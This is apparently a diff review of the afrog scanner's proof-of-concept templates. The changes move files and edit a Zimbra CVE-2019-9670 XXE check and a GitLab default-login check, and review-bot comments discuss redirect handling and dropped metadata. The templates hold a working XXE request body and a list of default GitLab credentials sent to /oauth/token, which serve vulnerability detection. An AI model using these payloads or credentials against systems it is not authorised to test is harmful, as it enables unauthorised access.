afrog-pocs/cve/2017/CVE-2017-12149.yaml afrog-pocs/CVE/2017/CVE-2017-12149.yamlContent is identical
afrog-pocs/cve/2017/CVE-2017-12629.yml afrog-pocs/CVE/2017/CVE-2017-12629.yamlContent is identical
afrog-pocs/cve/2019/CVE-2019-10758.yml afrog-pocs/CVE/2019/CVE-2019-10758.yamlContent is identical
1 - id: zimbra-cve-2019-9670-xxe 1 + id: CVE-2019-9670 2 2 3 3 info: 4 - name: zimbra-cve-2019-9670-xxe 4 + name: Zimbra Collaboration XXE 5 5 author: fnmsd(https://blog.csdn.net/fnmsd) 6 - severity: high 6 + severity: critical 7 7 8 - manual: true 9 - transport: http 10 8 rules: 11 9 r0: 12 10 request: 13 - cache: true 14 11 method: POST 15 12 path: /Autodiscover/Autodiscover.xml 16 13 headers: 17 14 Content-Type: text/xml 18 15 body: <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:./" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>[email protected]</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover> 19 - follow_redirects: false 20 16 expression: response.body.bcontains(b"zmmailboxd.out") && response.body.bcontains(b"Requested response schema not available") 21 17 expression: r0() 22 18 -
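Review bot: Dropping `follow_redirects: false` from `r0` leaves redirect handling to the engine default, which this page does not show; if that default follows redirects, the `expression` can end up evaluated against a response from a different host than the one the finding is reported for. The same line is removed from `r0`–`r5` of the GitLab default-login template further down, where the POST body carries credentials. I would keep `follow_redirects: false` explicit in each request unless the default is documented as off. Separately, `severity` is raised from high to critical while `info` still has no `description` or `reference`; a one-line description and an advisory link would let a triager check the rating.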
afrog-pocs/unreviewed/saltstack-cve-2020-16846.yml afrog-pocs/CVE/2020/CVE-2020-16846.yamlContent is identical
afrog-pocs/cve/2020/CVE-2020-28185.yaml afrog-pocs/CVE/2020/CVE-2020-28185.yamlContent is identical
afrog-pocs/cve/2020/CVE-2020-9496.yml afrog-pocs/CVE/2020/CVE-2020-9496.yamlContent is identical
afrog-pocs/cve/2022/CVE-2022-25568.yaml afrog-pocs/CVE/2022/CVE-2022-25568.yamlContent is identical
afrog-pocs/login/default-pwd/chinaunicom-default-login.yaml afrog-pocs/default-pwd/chinaunicom-default-login.yamlContent is identical
skipped 4 lines 5 5 author: Suman_Kar,dwisiswant0 6 6 severity: high 7 7 description: Gitlab default login credentials were discovered. 8 - tags: gitlab,default-login 9 8 reference: 10 9 - https://twitter.com/0xmahmoudJo0/status/1467394090685943809 11 10 - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab 12 - metadata: 13 - shodan-query: http.title:"GitLab" 14 - classification: 15 - cwe-id: CWE-798 16 11 17 12 set: 18 13 hostname: request.url.host 19 14 hosturl: request.url 20 - 21 - manual: true 22 - transport: http 23 15 rules: 24 16 r0: 25 17 request: 26 - cache: true 27 18 method: POST 28 19 path: /oauth/token 29 20 headers: skipped 3 lines 33 24 content-type: application/json 34 25 body: | 35 26 {"grant_type":"password","username":"root","password":"5iveL!fe"} 36 - follow_redirects: false 37 27 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 38 28 r1: 39 29 request: 40 - cache: true 41 30 method: POST 42 31 path: /oauth/token 43 32 headers: skipped 3 lines 47 36 content-type: application/json 48 37 body: | 49 38 {"grant_type":"password","username":"root","password":"123456789"} 50 - follow_redirects: false 51 39 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 52 40 r2: 53 41 request: 54 - cache: true 55 42 method: POST 56 43 path: /oauth/token 57 44 headers: skipped 3 lines 61 48 content-type: application/json 62 49 body: | 63 50 {"grant_type":"password","username":"admin","password":"5iveL!fe"} 64 - follow_redirects: false 65 51 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && 
response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 66 52 r3: 67 53 request: 68 - cache: true 69 54 method: POST 70 55 path: /oauth/token 71 56 headers: skipped 3 lines 75 60 content-type: application/json 76 61 body: | 77 62 {"grant_type":"password","username":"admin","password":"123456789"} 78 - follow_redirects: false 79 63 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 80 64 r4: 81 65 request: 82 - cache: true 83 66 method: POST 84 67 path: /oauth/token 85 68 headers: skipped 3 lines 89 72 content-type: application/json 90 73 body: | 91 74 {"grant_type":"password","username":"[email protected]","password":"5iveL!fe"} 92 - follow_redirects: false 93 75 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 94 76 r5: 95 77 request: 96 - cache: true 97 78 method: POST 98 79 path: /oauth/token 99 80 headers: skipped 3 lines 103 84 content-type: application/json 104 85 body: | 105 86 {"grant_type":"password","username":"[email protected]","password":"123456789"} 106 - follow_redirects: false 107 87 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 108 88 expression: r0() || r1() || r2() || r3() || r4() || r5() 109 89 skipped 1 lines -
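Review bot: Removing `tags`, `metadata` and `classification: cwe-id: CWE-798` from `info` drops the only machine-readable triage data this template carried, so findings can no longer be filtered by tag or mapped to the hard-coded-credentials weakness class. If the new template schema rejects those keys, I would at least keep the CWE in the free text, e.g. `description: Gitlab default login credentials were discovered (CWE-798).` The hunk starts after four skipped lines, so the `id` and `name` fields are not visible here.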